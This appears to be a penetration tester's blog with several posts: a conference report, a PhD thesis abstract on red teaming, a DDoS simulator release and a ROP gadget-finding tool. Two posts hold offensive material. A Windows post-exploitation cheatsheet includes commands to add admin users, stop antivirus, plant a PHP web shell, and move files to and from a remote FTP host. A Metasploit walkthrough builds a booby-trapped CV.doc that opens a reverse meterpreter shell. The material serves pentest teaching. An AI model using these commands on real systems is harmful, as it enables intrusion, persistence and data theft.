Impressions from Hacktivity 2012

Posted in security conferences on October 18, 2012 by stormsecurity

I have recently returned from Budapest, where I participated at Hacktivity 2012 as a speaker. Several people asked me for impressions from the conference and I thought it would be better to write them all in one place, here.

So I presented “Digipass Instrumentation for Fun and Profit“. I will not post the slides here as the video of the talk will be soon made public on the conference’s website http://www.hacktivity.com, including the slides.

The location of the conference (MOM Cultural Center) was well chosen as it had two separate halls for presentations to be held in parallel without any interference. There were also smaller rooms for different types of activities (lockpicking, electronics lab, various workshops and games) where people could try their skills throughout the day.

I think there were more than 1000 participants in the first day of the conference, their number decreasing until the end of the second day. As any other security conference, the wireless network was full of people scanning, sniffing and trying to hack eachother. Not a good place to connect with your ‘smart’phoneūüôā

From the speaker’s perspective, I always had the feeling that the conference’s organizers did their best to make us feel welcome and special. Of course, we did our best to make good presentations in order to satisfy the numerous audience who was eager to hear quality stuff. I think everybody had something to win from this approach.

Overall, there were good technical presentations, some more basic and some more advanced. You could find talks for any taste and flavor. This was the schedule.

In conclusion, I recommend Hacktivity as a great security conference to attend or to give a talk. Many interesting people and a great personal and professional experience.

Manual pentesting cheatsheet (Windows)

Posted in How To, Penetration testing with tags , , , on June 5, 2012 by stormsecurity

This is a list of commands that can be useful when you have a shell on a Windows box and you want to do local discovery, escalate privileges and pivot (without using tools as Metasploit):

View your current user: whoami
View information about the current user: net user myuser(for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Update:

A¬†friend pointed me to a more comprehensive list of Windows commands that can be utilized for post-exploitation here. Thanks, Cosmin!ūüėČ

My PhD Thesis

Posted in Uncategorized on January 21, 2012 by stormsecurity

In September 2011 I successfully defended my PhD Thesis at the Military Technical Academy of Bucharest. It was a beautiful moment of my life and I want to thank everyone who stood there by me.

Because several people asked me to publish my work, here it is.

Title: Proactive Cyber Security by Red Teaming

Acknowledgements:

It is a pleasure for me to thank all the people who made this Thesis possible.

I am deeply grateful to my supervisor, prof. dr. ing. Victor-Valeriu Patriciu for his valuable advice and for his great ideas that he shared with me during the doctoral program. His academic experience and his close supervision made me feel this work easier than it really was.

I also want to thank prof. dr. ing. Ion Bica, Head of “Computers and Military Information Systems” Department from the Military Technical Academy of Bucharest for his precious guidelines and critical review of this Thesis.
Many thanks also to my colleagues and friends from KPMG Romania, IT Advisory Department and from Romtelecom, IT Security Department for their informal support and encouragement in realization of this work.

This Thesis would not have been possible without the precious help of my wife, Silvia, whose love and understanding encouraged me to continue my research and finish the work in time, so I sincerely thank her. I would also like to thank my parents for their support and for the education they gave me.

Abstract:

Our society is dependent on computers and software, which makes it increasingly vulnerable to cybernetic attacks. These attacks affect us at national, organizational and personal levels and are caused by an ineffective approach towards security. Classic security measures – which are reactive and defensive – are no longer enough against today’s cybernetic threats. There is a high need for proactive security measures to effectively protect the information systems.

The goal of this Thesis is to bring a set of improvements to the Red Teaming assessment process for information systems. Red Teaming is an advanced form of evaluation which implements the proactive approach towards security. It simulates advanced cyber threats, finds vulnerabilities in the target systems and reports them to systems’ owner, providing a reliable basis for decision making within an organization.

In the Thesis we create a comprehensive view of the Red Teaming process, including the perspective of the client and the prespective of the provider. We analyze and implement different attack techniques that can be used during Red Teaming assessments and explore the methods of finding new vulnerabilities in software products with a greater emphasis on the fuzzing technique. Further on, we analyze and implement a set of techniques for vulnerability exploitation on modern operating systems, including the bypass methods for Windows protection mechanisms (Stack Cookies, SafeSEH, DEP and ASLR). In the end we address the problem of creating cyber defense exercises as a method for training Red Team members and system’s defenders and we propose a standard template for creating this type of exercises.

Contents:

List of Tables
List of Figures
Abstract
1. Introduction
2. Current state of cyber security
3. Red Teaming Usage in Securing Information Systems
4. Cyber attack techniques
5. Discovery of software vulnerabilities
6. Exploitation of software vulnerabilities
7. Training the Red Teams using cyber defense exercises
8. Summary, Conclusions and Future work
Bibliography
Appendices

I hope you will find it a pleasant reading.

From Windows thumbnails vulnerability to remote shell

Posted in How To, Penetration testing with tags , , , , , on January 9, 2011 by stormsecurity

Beware of thubnails!

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy.The victim just needs to view a file like CV.doc in Windows Explorer – thumbnails mode – and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc)executes the Windows calculator:

Exploit thumbnail vulnerability

Exploiting the thumbnail vulnerability CVE-2010-3970

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit

2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit

Et voila! The shell we were waiting for…

Meterpreter session

Meterpreter session open

Until a patch will be provided, Microsoft clients can use the Fix it tool described in this support page.

Red Teaming Usage for Assessing Information Security

Posted in Cyber Defense with tags , , , on December 23, 2010 by stormsecurity

Red Teaming of information systems is an advanced form of assessment performed by a team of highly skilled penetration testers and security specialists.

Considerations about Red Teaming Usage in Assessing Information Assurance is an article that I have recently written and presented to SECITC 2010 security conferece. Please find below the abstract and table of contents which should increase your interest for reading it.

Abstract: Red Teaming is an advanced form of assessment that models and simulates adversary actions with the overall purpose of discovering target’s weaknesses and improving its defenses. Also known as ethical hacking, penetration testing or security assessment, Red Teaming of information systems offers reliable information about the effectiveness of defense mechanisms implemented. The paper presents the Red Teaming process from both perspectives: the client and the assessor, covering various aspects like: motivation, assessment types, client benefits, client risks, assessment planning, team organization, attack preparation, execution and reporting.

Contents:

  1. Introduction
  2. What is Red Teaming?
  3. Red Teaming assessment from the client’s perspective
    • Why should an organization use a Red Teaming assessment?
    • When is the best time to use a Red Teaming assessment?
    • What are the benefits for the client?
    • What are the risks for the client?
    • What type of assessment should be chosen?
    • Who can be the target?
  4. Red Teaming assessment from the provider’s perspective
    • Define assessment objectives
    • Assemble the Red Team
    • Reverse engineer the target
    • Create and validate attack trees
    • Assign Red Team members to attacks
    • Prepare tools and methods
    • Perform collaborative attacks
    • Create the report
    • Explain report to client
  5. Conclusions

New version of ddosim – DDOS simulator

Posted in DDoS, Tools (StormSecurity) on November 4, 2010 by stormsecurity

I am pleased to announce a new version of ddosim (v0.2) Рthe application layer DDOS simulator. It can be downloaded from http://sourceforge.net/projects/ddosim/.

For documentation and use cases please see this post.

If you have¬†any questions, don’t hesitate to ask!

Backward disassembler for ROP exploitation

Posted in Exploit development, Tools (StormSecurity) with tags , , , , , on September 17, 2010 by stormsecurity

bdasm is a PyCommand that I wrote for Immunity Debugger (v 1.73) which can search the address space of a process for a certain opcode/instruction and dissasemble backward and forward for a  specified number of instructions. 

This is especially useful in the exploit development process when existing gadget finding tools do not produce the results you need and you must extend your search manually. 

When using the return-oriented-programming (ROP) technique for exploit development, you usually need to find useful instructions followed by RET. There are some tools to search for these gadgets (ex. pvefindaddr) but what if they do not find the gadgets you need? The search must be extended and bdasm is the tool you need. 

Use case scenarios: 

Example 1: Search for all occurences of instruction xchg eax,esp in the address space of module kernel32.dll and display the instructions before and after. Display results only if the page is executable (-e) and if the instructions after contain a RET (-r). The space character from an instruction must be replaced by _ : 

!bdasm -i xchg_eax,esp -m kernel32.dll -e -r 

Search for instruction and disassemble

Disassemble at instruction

Notes:

  • As you can see in the screenshots, backward disassembling can produce multiple results from the same starting address because x86 instructions have variable lengths
  • Backward disassembling¬†does not¬†always produce results when it is started¬†from an arbitrary address because the previous bytes of that address do not always form a valid instruction
  • bdasm tries to go backwards as many instructions as it can find, implementing a kind of backtracking algorithm

Example 2: Search for all occurences of add esp, xxx in module kernel32.dll. To do this, we assemble the instruction add esp, 50 and we obtain the opcode 81c450. So we will search for all occurences of the byte sequence 81c4 in module msvcrt.dll:

!bdasm -o 83c4 -m msvcrt.dll -e -r

Disassemble at opcode / byte sequence

Example 3: Disassemble (backward and forward) from a specific address. Print maximum 4 instructions backward and 6 instructions forward:

!bdasm -a 71ad26b1 -b 4 -f 6

Disassemble at address

 

Installation and usage:

Copy bdasm.py into the PyCommands directory of your Immunity Debugger installation (my path is C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)

For usage instructions type: !bdasm in the Command Bar of Immunity Debugger.

Hoping that this tool will be useful to you, do not hesitate to send me any feedback!

Cheers,